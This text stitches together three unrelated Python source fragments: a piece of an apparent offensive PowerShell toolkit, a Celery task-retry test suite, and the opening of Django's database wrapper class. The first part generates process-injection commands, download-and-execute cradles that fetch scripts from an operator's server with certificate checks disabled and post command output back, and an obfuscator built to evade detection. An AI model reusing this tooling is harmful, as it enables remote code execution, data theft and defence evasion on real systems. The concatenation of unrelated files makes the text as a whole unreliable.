gwmi win32_process | where {{$_.Name.ToLower() -eq '{procname}'.ToLower()}} | % {{
    if ($_.getowner().domain -and $_.getowner().user){{
    $owners[$_.getowner().domain + "\\" + $_.getowner().user] = $_.handle
    }}
}}
try {{
    if ($owners.ContainsKey($console_login)){{
        Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command
        $injected = $True
        $owners.Remove($console_login)
    }}
}}
catch {{}}
if (($injected -eq $False) -or ($inject_once -eq $False)){{
    foreach ($owner in $owners.Values) {{
        try {{
            Invoke-PSInject -ProcId $owner -PoshCode $command
        }}
        catch {{}}
    }}
}}
'''.format(inject_once='$True' if inject_once else '$False',
           command=encode_ps_command(command), procname=procname)
    if context:
        return gen_ps_iex_cradle(context, 'Invoke-PSInject.ps1', ps_code, post_back=False)
    return ps_code
def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):
    """Generates a PowerShell download cradle that IEX-es hosted script(s).

    Args:
        context: connection context exposing .server (url scheme), .localip
            and .server_port, used to build the download URL(s).
        scripts: a single script file name (str) or a list of script file
            names to download from our web server and execute.
        command: PowerShell to run after the script(s) are loaded. It is only
            embedded directly when post_back is False.
        post_back: when True, append a stub that POSTs the command output
            back to our web server.

    Returns:
        The generated PowerShell launcher, stripped of surrounding
        whitespace.
    """
    if type(scripts) is str:
        launcher = """
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_script_name}')
{command}
""".format(server=context.server,
           port=context.server_port,
           addr=context.localip,
           ps_script_name=scripts,
           command=command if post_back is False else '').strip()
    elif type(scripts) is list:
        launcher = '[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n'
        # BUG FIX: this line previously lacked a trailing newline, which glued
        # the first IEX statement onto the SecurityProtocol line and produced
        # invalid PowerShell.
        launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'\n"
        for script in scripts:
            launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format(server=context.server,
                                                                                                                      port=context.server_port,
                                                                                                                      addr=context.localip,
                                                                                                                      script=script)
        # (A dead no-op launcher.strip() call was removed here; strings are
        # immutable and its result was discarded.)
        launcher += command if post_back is False else ''
    if post_back is True:
        # POST the command's output back to our web server.
        launcher += '''
$cmd = {command}
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()'''.format(server=context.server,
                                 port=context.server_port,
                                 addr=context.localip,
                                 command=command)
    logging.debug('Generated PS IEX Launcher:\n {}\n'.format(launcher))
    return launcher.strip()
# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py
def invoke_obfuscation(scriptString):
    """Obfuscates a PowerShell script using randomized encoding.

    Ports part of Invoke-Obfuscation's ENCODING scheme to Python: the script
    is turned into delimited/comma-separated character codes, a random
    decode-and-join expression is built around them, and a random
    IEX/Invoke-Expression form executes the result. Output differs between
    calls but always evaluates back to *scriptString*.
    """
    # Add letters a-z with random case to $RandomDelimiters.
    alphabet = ''.join(choice([i.upper(), i]) for i in ascii_lowercase)
    # Create list of random dxelimiters called randomDelimiters.
    # Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.
    randomDelimiters = ['_','-',',','{','}','~','!','@','%','&','<','>',';',':']
    for i in alphabet:
        randomDelimiters.append(i)
    # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
    randomDelimiters = [choice(randomDelimiters) for _ in range(int(len(randomDelimiters)/4))]
    # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters.
    delimitedEncodedArray = ''
    for char in scriptString:
        delimitedEncodedArray += str(ord(char)) + choice(randomDelimiters)
    # Remove trailing delimiter from $DelimitedEncodedArray.
    delimitedEncodedArray = delimitedEncodedArray[:-1]
    # Create printable version of $RandomDelimiters in random order to be used by final command.
    test = sample(randomDelimiters, len(randomDelimiters))
    randomDelimitersToPrint = ''.join(i for i in test)
    # Generate random case versions for necessary operations.
    forEachObject = choice(['ForEach','ForEach-Object','%'])
    strJoin = ''.join(choice([i.upper(), i.lower()]) for i in '[String]::Join')
    strStr = ''.join(choice([i.upper(), i.lower()]) for i in '[String]')
    join = ''.join(choice([i.upper(), i.lower()]) for i in '-Join')
    charStr = ''.join(choice([i.upper(), i.lower()]) for i in 'Char')
    integer = ''.join(choice([i.upper(), i.lower()]) for i in 'Int')
    forEachObject = ''.join(choice([i.upper(), i.lower()]) for i in forEachObject)
    # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax.
    randomDelimitersToPrintForDashSplit = ''
    for delim in randomDelimiters:
        # Random case 'split' string.
        split = ''.join(choice([i.upper(), i.lower()]) for i in 'Split')
        randomDelimitersToPrintForDashSplit += '-' + split + choice(['', ' ']) + '\'' + delim + '\'' + choice(['', ' '])
    randomDelimitersToPrintForDashSplit = randomDelimitersToPrintForDashSplit.strip('\t\n\r')
    # Randomly select between various conversion syntax options.
    randomConversionSyntax = []
    randomConversionSyntax.append('[' + charStr + ']' + choice(['', ' ']) + '[' + integer + ']' + choice(['', ' ']) + '$_')
    randomConversionSyntax.append('[' + integer + ']' + choice(['', ' ']) + '$_' + choice(['', ' ']) + choice(['-as', '-As', '-aS', '-AS']) + choice(['', ' ']) + '[' + charStr + ']')
    randomConversionSyntax = choice(randomConversionSyntax)
    # Create array syntax for encoded scriptString as alternative to .Split/-Split syntax.
    encodedArray = ''
    for char in scriptString:
        encodedArray += str(ord(char)) + choice(['', ' ']) + ',' + choice(['', ' '])
    # Remove trailing comma from encodedArray
    encodedArray = '(' + choice(['', ' ']) + encodedArray.rstrip().rstrip(',') + ')'
    # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable).
    # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists.
    # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls
    # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables
    setOfsVarSyntax = []
    setOfsVarSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "''")
    setOfsVarSyntax.append(choice(['Set-Variable', 'SV', 'SET']) + choice([' '*1, ' '*2]) + "'OFS'" + choice([' '*1, ' '*2]) + "''")
    setOfsVar = choice(setOfsVarSyntax)
    setOfsVarBackSyntax = []
    # NOTE(review): both entries below are identical Set-Item forms; the
    # upstream script likely intended a Set-Variable/SV/SET variant for the
    # second one. Harmless — it only reduces output variety.
    setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
    setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
    setOfsVarBack = choice(setOfsVarBackSyntax)
    # Randomize case of $SetOfsVar and $SetOfsVarBack.
    setOfsVar = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVar)
    setOfsVarBack = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVarBack)
    # Generate the code that will decrypt and execute the payload and randomly select one.
    baseScriptArray = []
    baseScriptArray.append('[' + charStr + '[]' + ']' + choice(['', ' ']) + encodedArray)
    # NOTE(review): 'split' here reuses the value left over from the last
    # iteration of the delimiter loop above — intentional in the upstream
    # code, but easy to misread.
    baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'." + split + "(" + choice(['', ' ']) + "'" + randomDelimitersToPrint + "'" + choice(['', ' ']) + ')' + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
    baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'" + choice(['', ' ']) + randomDelimitersToPrintForDashSplit + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
    baseScriptArray.append('(' + choice(['', ' ']) + encodedArray + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
    # Generate random JOIN syntax for all above options
    newScriptArray = []
    newScriptArray.append(choice(baseScriptArray) + choice(['', ' ']) + join + choice(['', ' ']) + "''")
    newScriptArray.append(join + choice(['', ' ']) + choice(baseScriptArray))
    newScriptArray.append(strJoin + '(' + choice(['', ' ']) + "''" + choice(['', ' ']) + ',' + choice(['', ' ']) + choice(baseScriptArray) + choice(['', ' ']) + ')')
    newScriptArray.append('"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVar + choice(['', ' ']) + ')' + choice(['', ' ']) + '"' + choice(['', ' ']) + '+' + choice(['', ' ']) + strStr + choice(baseScriptArray) + choice(['', ' ']) + '+' + '"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVarBack + choice(['', ' ']) + ')' + choice(['', ' ']) + '"')
    # Randomly select one of the above commands.
    newScript = choice(newScriptArray)
    # Generate random invoke operation syntax.
    # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies.
    invokeExpressionSyntax = []
    invokeExpressionSyntax.append(choice(['IEX', 'Invoke-Expression']))
    # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &.
    # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet.
    # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc.
    invocationOperator = choice(['.','&']) + choice(['', ' '])
    invokeExpressionSyntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')")
    invokeExpressionSyntax.append(invocationOperator + "( $PSHome[" + choice(['4', '21']) + "]+$PSHOME[" + choice(['30', '34']) + "]+'x')")
    invokeExpressionSyntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')")
    invokeExpressionSyntax.append(invocationOperator + "( $env:ComSpec[4," + choice(['15', '24', '26']) + ",25]-Join'')")
    invokeExpressionSyntax.append(invocationOperator + "((" + choice(['Get-Variable','GV','Variable']) + " '*mdr*').Name[3,11,2]-Join'')")
    invokeExpressionSyntax.append(invocationOperator + "( " + choice(['$VerbosePreference.ToString()','([String]$VerbosePreference)']) + "[1,3]+'x'-Join'')")
    # Randomly choose from above invoke operation syntaxes.
    invokeExpression = choice(invokeExpressionSyntax)
    # Randomize the case of selected invoke operation.
    invokeExpression = ''.join(choice([i.upper(), i.lower()]) for i in invokeExpression)
    # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
    invokeOptions = []
    invokeOptions.append(choice(['', ' ']) + invokeExpression + choice(['', ' ']) + '(' + choice(['', ' ']) + newScript + choice(['', ' ']) + ')' + choice(['', ' ']))
    invokeOptions.append(choice(['', ' ']) + newScript + choice(['', ' ']) + '|' + choice(['', ' ']) + invokeExpression)
    obfuscatedPayload = choice(invokeOptions)
    """
    # Array to store all selected PowerShell execution flags.
    powerShellFlags = []
    noProfile = '-nop'
    nonInteractive = '-noni'
    windowStyle = '-w'
    # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order.
    # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags.
    commandlineOptions = []
    commandlineOptions.append(noProfile[0:randrange(4, len(noProfile) + 1, 1)])
    commandlineOptions.append(nonInteractive[0:randrange(5, len(nonInteractive) + 1, 1)])
    # Randomly decide to write WindowStyle value with flag substring or integer value.
    commandlineOptions.append(''.join(windowStyle[0:randrange(2, len(windowStyle) + 1, 1)] + choice([' '*1, ' '*2, ' '*3]) + choice(['1','h','hi','hid','hidd','hidde'])))
    # Randomize the case of all command-line arguments.
    for count, option in enumerate(commandlineOptions):
        commandlineOptions[count] = ''.join(choice([i.upper(), i.lower()]) for i in option)
    for count, option in enumerate(commandlineOptions):
        commandlineOptions[count] = ''.join(option)
    commandlineOptions = sample(commandlineOptions, len(commandlineOptions))
    commandlineOptions = ''.join(i + choice([' '*1, ' '*2, ' '*3]) for i in commandlineOptions)
    obfuscatedPayload = 'powershell.exe ' + commandlineOptions + newScript
    """
    return obfuscatedPayload
| |
from __future__ import absolute_import
from datetime import datetime, timedelta
from kombu import Queue
from celery import Task
from celery.exceptions import Retry
from celery.five import items, range, string_t
from celery.result import EagerResult
from celery.utils import uuid
from celery.utils.timeutils import parse_iso8601
from celery.tests.case import AppCase, depends_on_current_app, patch
def return_True(*args, **kwargs):
    """Always return ``True``, ignoring all positional/keyword arguments.

    Defined at module level (not as a closure/lambda) because task run
    functions must be picklable.
    """
    return True
def raise_exception(self, **kwargs):
    """Unconditionally raise a generic ``Exception`` naming *self*'s class."""
    message = '%s error' % self.__class__
    raise Exception(message)
class MockApplyTask(Task):
    """Task stub whose ``apply_async`` only counts calls instead of sending.

    ``applied`` records how many times ``apply_async`` was invoked, which lets
    retry tests assert that a re-delivery was attempted without a broker.
    """
    abstract = True
    applied = 0

    def run(self, x, y):
        """Return the product of the two positional arguments."""
        return x * y

    def apply_async(self, *args, **kwargs):
        # Swallow the dispatch; just record that it happened.
        self.applied = self.applied + 1
class TasksCase(AppCase):
    """Base case registering a set of helper tasks on ``self.app``.

    Every task created in :meth:`setup` is also bound to an attribute of the
    case (``self.mytask``, ``self.retry_task``, ...) so subclasses can apply
    and inspect them directly without going through the app registry.
    """
    def setup(self):
        # Plain task that always returns True (module-level ``return_True``).
        self.mytask = self.app.task(shared=False)(return_True)
        # ``count=0`` seeds a custom attribute on the task instance.
        @self.app.task(bind=True, count=0, shared=False)
        def increment_counter(self, increment_by=1):
            # ``increment_by or 1`` treats 0/None as "increment by one".
            self.count += increment_by or 1
            return self.count
        self.increment_counter = increment_counter
        @self.app.task(shared=False)
        def raising():
            # Used to test error propagation through apply()/get().
            raise KeyError('foo')
        self.raising = raising
        # Retries until ``retries >= rmax`` (or forever when ``care`` is
        # falsy), then returns its first argument.
        @self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
        def retry_task(self, arg1, arg2, kwarg=1, max_retries=None, care=True):
            self.iterations += 1
            # Explicit ``max_retries`` argument overrides the task default.
            rmax = self.max_retries if max_retries is None else max_retries
            assert repr(self.request)
            retries = self.request.retries
            if care and retries >= rmax:
                return arg1
            else:
                raise self.retry(countdown=0, max_retries=rmax)
        self.retry_task = retry_task
        # Same retry pattern, but accepting only keyword arguments.
        @self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
        def retry_task_noargs(self, **kwargs):
            self.iterations += 1
            if self.request.retries >= 3:
                return 42
            else:
                raise self.retry(countdown=0)
        self.retry_task_noargs = retry_task_noargs
        # Uses MockApplyTask as base so re-deliveries are counted, not sent.
        @self.app.task(bind=True, max_retries=3, iterations=0,
                       base=MockApplyTask, shared=False)
        def retry_task_mockapply(self, arg1, arg2, kwarg=1):
            self.iterations += 1
            retries = self.request.retries
            if retries >= 3:
                return arg1
            raise self.retry(countdown=0)
        self.retry_task_mockapply = retry_task_mockapply
        # Retries with an explicit custom exception carried via ``exc=``.
        @self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
        def retry_task_customexc(self, arg1, arg2, kwarg=1, **kwargs):
            self.iterations += 1
            retries = self.request.retries
            if retries >= 3:
                return arg1 + kwarg
            else:
                try:
                    raise MyCustomException('Elaine Marie Benes')
                except MyCustomException as exc:
                    kwargs.update(kwarg=kwarg)
                    raise self.retry(countdown=0, exc=exc)
        self.retry_task_customexc = retry_task_customexc
class MyCustomException(Exception):
    """Test-only exception used to exercise custom-exception retry paths."""
class test_task_retries(TasksCase):
    """Behavior of ``Task.retry``: counts, overrides, exceptions, limits."""
    def test_retry(self):
        # max_retries=3 means 1 initial run + 3 retries = 4 iterations.
        self.retry_task.max_retries = 3
        self.retry_task.iterations = 0
        self.retry_task.apply([0xFF, 0xFFFF])
        self.assertEqual(self.retry_task.iterations, 4)
        # A per-call max_retries override takes precedence (10 -> 11 runs).
        self.retry_task.max_retries = 3
        self.retry_task.iterations = 0
        self.retry_task.apply([0xFF, 0xFFFF], {'max_retries': 10})
        self.assertEqual(self.retry_task.iterations, 11)
    def test_retry_no_args(self):
        self.retry_task_noargs.max_retries = 3
        self.retry_task_noargs.iterations = 0
        self.retry_task_noargs.apply(propagate=True).get()
        self.assertEqual(self.retry_task_noargs.iterations, 4)
    def test_retry_kwargs_can_be_empty(self):
        # retry(kwargs=None) must not blow up on a missing kwargs dict.
        self.retry_task_mockapply.push_request()
        try:
            with self.assertRaises(Retry):
                import sys
                try:
                    # Python 2 only; cleared so no stale exception leaks in.
                    sys.exc_clear()
                except AttributeError:
                    pass
                self.retry_task_mockapply.retry(args=[4, 4], kwargs=None)
        finally:
            self.retry_task_mockapply.pop_request()
    def test_retry_not_eager(self):
        self.retry_task_mockapply.push_request()
        try:
            self.retry_task_mockapply.request.called_directly = False
            exc = Exception('baz')
            try:
                # throw=False: retry re-delivers (MockApplyTask counts it)
                # without raising Retry.
                self.retry_task_mockapply.retry(
                    args=[4, 4], kwargs={'task_retries': 0},
                    exc=exc, throw=False,
                )
                self.assertTrue(self.retry_task_mockapply.applied)
            finally:
                self.retry_task_mockapply.applied = 0
            try:
                # throw=True: retry both re-delivers and raises Retry.
                with self.assertRaises(Retry):
                    self.retry_task_mockapply.retry(
                        args=[4, 4], kwargs={'task_retries': 0},
                        exc=exc, throw=True)
                self.assertTrue(self.retry_task_mockapply.applied)
            finally:
                self.retry_task_mockapply.applied = 0
        finally:
            self.retry_task_mockapply.pop_request()
    def test_retry_with_kwargs(self):
        self.retry_task_customexc.max_retries = 3
        self.retry_task_customexc.iterations = 0
        self.retry_task_customexc.apply([0xFF, 0xFFFF], {'kwarg': 0xF})
        self.assertEqual(self.retry_task_customexc.iterations, 4)
    def test_retry_with_custom_exception(self):
        # When retries run out, the exception passed via ``exc=`` is raised.
        self.retry_task_customexc.max_retries = 2
        self.retry_task_customexc.iterations = 0
        result = self.retry_task_customexc.apply(
            [0xFF, 0xFFFF], {'kwarg': 0xF},
        )
        with self.assertRaises(MyCustomException):
            result.get()
        self.assertEqual(self.retry_task_customexc.iterations, 3)
    def test_max_retries_exceeded(self):
        # care=False: the task never succeeds, so the limit must trip.
        self.retry_task.max_retries = 2
        self.retry_task.iterations = 0
        result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False})
        with self.assertRaises(self.retry_task.MaxRetriesExceededError):
            result.get()
        self.assertEqual(self.retry_task.iterations, 3)
        self.retry_task.max_retries = 1
        self.retry_task.iterations = 0
        result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False})
        with self.assertRaises(self.retry_task.MaxRetriesExceededError):
            result.get()
        self.assertEqual(self.retry_task.iterations, 2)
class test_canvas_utils(TasksCase):
    """Smoke tests for the canvas helpers exposed on every task."""
    def test_si(self):
        # ``si()`` builds an immutable signature.
        self.assertTrue(self.retry_task.si())
        self.assertTrue(self.retry_task.si().immutable)
    def test_chunks(self):
        self.assertTrue(self.retry_task.chunks(range(100), 10))
    def test_map(self):
        self.assertTrue(self.retry_task.map(range(100)))
    def test_starmap(self):
        self.assertTrue(self.retry_task.starmap(range(100)))
    def test_on_success(self):
        # Default on_success handler must accept the standard 4-tuple.
        self.retry_task.on_success(1, 1, (), {})
class test_tasks(TasksCase):
    """General task behavior: messaging, options, context and repr."""
    def now(self):
        # Current time according to the app (honours its timezone settings).
        return self.app.now()
    @depends_on_current_app
    def test_unpickle_task(self):
        import pickle
        @self.app.task(shared=True)
        def xxx():
            pass
        # Unpickling must resolve to the registered task instance.
        self.assertIs(pickle.loads(pickle.dumps(xxx)), xxx.app.tasks[xxx.name])
    def test_AsyncResult(self):
        task_id = uuid()
        result = self.retry_task.AsyncResult(task_id)
        self.assertEqual(result.backend, self.retry_task.backend)
        self.assertEqual(result.id, task_id)
    def assertNextTaskDataEqual(self, consumer, presult, task_name,
                                test_eta=False, test_expires=False, **kwargs):
        # Helper: pop the next message off the queue and verify its payload
        # (id, task name, kwargs, and optionally ISO-8601 eta/expires).
        next_task = consumer.queues[0].get(accept=['pickle'])
        task_data = next_task.decode()
        self.assertEqual(task_data['id'], presult.id)
        self.assertEqual(task_data['task'], task_name)
        task_kwargs = task_data.get('kwargs', {})
        if test_eta:
            self.assertIsInstance(task_data.get('eta'), string_t)
            to_datetime = parse_iso8601(task_data.get('eta'))
            self.assertIsInstance(to_datetime, datetime)
        if test_expires:
            self.assertIsInstance(task_data.get('expires'), string_t)
            to_datetime = parse_iso8601(task_data.get('expires'))
            self.assertIsInstance(to_datetime, datetime)
        for arg_name, arg_value in items(kwargs):
            self.assertEqual(task_kwargs.get(arg_name), arg_value)
    def test_incomplete_task_cls(self):
        # A Task subclass without run() must raise NotImplementedError.
        class IncompleteTask(Task):
            app = self.app
            name = 'c.unittest.t.itask'
        with self.assertRaises(NotImplementedError):
            IncompleteTask().run()
    def test_task_kwargs_must_be_dictionary(self):
        with self.assertRaises(ValueError):
            self.increment_counter.apply_async([], 'str')
    def test_task_args_must_be_list(self):
        with self.assertRaises(ValueError):
            self.increment_counter.apply_async('str', {})
    def test_regular_task(self):
        self.assertIsInstance(self.mytask, Task)
        self.assertTrue(self.mytask.run())
        self.assertTrue(
            callable(self.mytask), 'Task class is callable()',
        )
        self.assertTrue(self.mytask(), 'Task class runs run() when called')
        with self.app.connection_or_acquire() as conn:
            consumer = self.app.amqp.TaskConsumer(conn)
            # TaskConsumer has no receive callback registered by default.
            with self.assertRaises(NotImplementedError):
                consumer.receive('foo', 'foo')
            consumer.purge()
            self.assertIsNone(consumer.queues[0].get())
            self.app.amqp.TaskConsumer(conn, queues=[Queue('foo')])
            # Without arguments.
            presult = self.mytask.delay()
            self.assertNextTaskDataEqual(consumer, presult, self.mytask.name)
            # With arguments.
            presult2 = self.mytask.apply_async(
                kwargs=dict(name='George Costanza'),
            )
            self.assertNextTaskDataEqual(
                consumer, presult2, self.mytask.name, name='George Costanza',
            )
            # send_task
            sresult = self.app.send_task(self.mytask.name,
                                         kwargs=dict(name='Elaine M. Benes'))
            self.assertNextTaskDataEqual(
                consumer, sresult, self.mytask.name, name='Elaine M. Benes',
            )
            # With eta.
            presult2 = self.mytask.apply_async(
                kwargs=dict(name='George Costanza'),
                eta=self.now() + timedelta(days=1),
                expires=self.now() + timedelta(days=2),
            )
            self.assertNextTaskDataEqual(
                consumer, presult2, self.mytask.name,
                name='George Costanza', test_eta=True, test_expires=True,
            )
            # With countdown.
            presult2 = self.mytask.apply_async(
                kwargs=dict(name='George Costanza'), countdown=10, expires=12,
            )
            self.assertNextTaskDataEqual(
                consumer, presult2, self.mytask.name,
                name='George Costanza', test_eta=True, test_expires=True,
            )
            # Discarding all tasks.
            consumer.purge()
            self.mytask.apply_async()
            self.assertEqual(consumer.purge(), 1)
            self.assertIsNone(consumer.queues[0].get())
            self.assertFalse(presult.successful())
            self.mytask.backend.mark_as_done(presult.id, result=None)
            self.assertTrue(presult.successful())
    def test_repr_v2_compat(self):
        self.mytask.__v2_compat__ = True
        self.assertIn('v2 compatible', repr(self.mytask))
    def test_apply_with_self(self):
        # ``__self__`` pre-binds the first (self) argument of the task.
        @self.app.task(__self__=42, shared=False)
        def tawself(self):
            return self
        self.assertEqual(tawself.apply().get(), 42)
        self.assertEqual(tawself(), 42)
    def test_context_get(self):
        self.mytask.push_request()
        try:
            request = self.mytask.request
            request.foo = 32
            self.assertEqual(request.get('foo'), 32)
            self.assertEqual(request.get('bar', 36), 36)
            request.clear()
        finally:
            self.mytask.pop_request()
    def test_task_class_repr(self):
        self.assertIn('class Task of', repr(self.mytask.app.Task))
        # An app-less Task class reprs as unbound.
        self.mytask.app.Task._app = None
        self.assertIn('unbound', repr(self.mytask.app.Task, ))
    def test_bind_no_magic_kwargs(self):
        self.mytask.accept_magic_kwargs = None
        self.mytask.bind(self.mytask.app)
    def test_annotate(self):
        # annotate() copies resolved annotation dicts onto the task class.
        with patch('celery.app.task.resolve_all_annotations') as anno:
            anno.return_value = [{'FOO': 'BAR'}]
            @self.app.task(shared=False)
            def task():
                pass
            task.annotate()
            self.assertEqual(task.FOO, 'BAR')
    def test_after_return(self):
        self.mytask.push_request()
        try:
            self.mytask.request.chord = self.mytask.s()
            self.mytask.after_return('SUCCESS', 1.0, 'foobar', (), {}, None)
            self.mytask.request.clear()
        finally:
            self.mytask.pop_request()
    def test_send_task_sent_event(self):
        with self.app.connection() as conn:
            self.app.conf.CELERY_SEND_TASK_SENT_EVENT = True
            self.assertTrue(self.app.amqp.TaskProducer(conn).send_sent_event)
    def test_update_state(self):
        @self.app.task(shared=False)
        def yyy():
            pass
        yyy.push_request()
        try:
            tid = uuid()
            # Explicit task_id argument.
            yyy.update_state(tid, 'FROBULATING', {'fooz': 'baaz'})
            self.assertEqual(yyy.AsyncResult(tid).status, 'FROBULATING')
            self.assertDictEqual(yyy.AsyncResult(tid).result, {'fooz': 'baaz'})
            # Falls back to the id from the current request.
            yyy.request.id = tid
            yyy.update_state(state='FROBUZATING', meta={'fooz': 'baaz'})
            self.assertEqual(yyy.AsyncResult(tid).status, 'FROBUZATING')
            self.assertDictEqual(yyy.AsyncResult(tid).result, {'fooz': 'baaz'})
        finally:
            yyy.pop_request()
    def test_repr(self):
        @self.app.task(shared=False)
        def task_test_repr():
            pass
        self.assertIn('task_test_repr', repr(task_test_repr))
    def test_has___name__(self):
        @self.app.task(shared=False)
        def yyy2():
            pass
        self.assertTrue(yyy2.__name__)
class test_apply_task(TasksCase):
    """Behavior of eagerly-applied tasks (``Task.apply`` / EagerResult)."""
    def test_apply_throw(self):
        # throw=True propagates the task's exception to the caller.
        with self.assertRaises(KeyError):
            self.raising.apply(throw=True)
    def test_apply_with_CELERY_EAGER_PROPAGATES_EXCEPTIONS(self):
        # The config flag has the same effect as throw=True.
        self.app.conf.CELERY_EAGER_PROPAGATES_EXCEPTIONS = True
        with self.assertRaises(KeyError):
            self.raising.apply()
    def test_apply(self):
        self.increment_counter.count = 0
        e = self.increment_counter.apply()
        self.assertIsInstance(e, EagerResult)
        self.assertEqual(e.get(), 1)
        e = self.increment_counter.apply(args=[1])
        self.assertEqual(e.get(), 2)
        e = self.increment_counter.apply(kwargs={'increment_by': 4})
        self.assertEqual(e.get(), 6)
        self.assertTrue(e.successful())
        self.assertTrue(e.ready())
        self.assertTrue(repr(e).startswith('<EagerResult:'))
        # A failed eager task is ready but not successful, keeps the
        # traceback, and re-raises on get().
        f = self.raising.apply()
        self.assertTrue(f.ready())
        self.assertFalse(f.successful())
        self.assertTrue(f.traceback)
        with self.assertRaises(KeyError):
            f.get()
| |
import copy
import time
import warnings
from collections import deque
from contextlib import contextmanager
import _thread
import pytz
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import DEFAULT_DB_ALIAS
from django.db.backends import utils
from django.db.backends.base.validation import BaseDatabaseValidation
from django.db.backends.signals import connection_created
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, DatabaseErrorWrapper
from django.utils import timezone
from django.utils.functional import cached_property
# Alias used for connections that must not select a database
# (see BaseDatabaseWrapper._nodb_connection, which passes NAME=None).
NO_DB_ALIAS = '__no_db__'
class BaseDatabaseWrapper:
    """Represent a database connection."""
    # Mapping of Field objects to their column types.
    data_types = {}
    # Mapping of Field objects to their SQL suffix such as AUTOINCREMENT.
    data_types_suffix = {}
    # Mapping of Field objects to their SQL for CHECK constraints.
    data_type_check_constraints = {}
    ops = None
    vendor = 'unknown'
    display_name = 'unknown'
    SchemaEditorClass = None
    # Classes instantiated in __init__().
    client_class = None
    creation_class = None
    features_class = None
    introspection_class = None
    ops_class = None
    validation_class = BaseDatabaseValidation

    # Maximum number of entries kept in self.queries_log (a bounded deque).
    queries_limit = 9000

    def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS,
                 allow_thread_sharing=False):
        # Connection related attributes.
        # The underlying database connection.
        self.connection = None
        # `settings_dict` should be a dictionary containing keys such as
        # NAME, USER, etc. It's called `settings_dict` instead of `settings`
        # to disambiguate it from Django settings modules.
        self.settings_dict = settings_dict
        self.alias = alias
        # Query logging in debug mode or when explicitly enabled.
        self.queries_log = deque(maxlen=self.queries_limit)
        self.force_debug_cursor = False
        # Transaction related attributes.
        # Tracks if the connection is in autocommit mode. Per PEP 249, by
        # default, it isn't.
        self.autocommit = False
        # Tracks if the connection is in a transaction managed by 'atomic'.
        self.in_atomic_block = False
        # Increment to generate unique savepoint ids.
        self.savepoint_state = 0
        # List of savepoints created by 'atomic'.
        self.savepoint_ids = []
        # Tracks if the outermost 'atomic' block should commit on exit,
        # ie. if autocommit was active on entry.
        self.commit_on_exit = True
        # Tracks if the transaction should be rolled back to the next
        # available savepoint because of an exception in an inner block.
        self.needs_rollback = False
        # Connection termination related attributes.
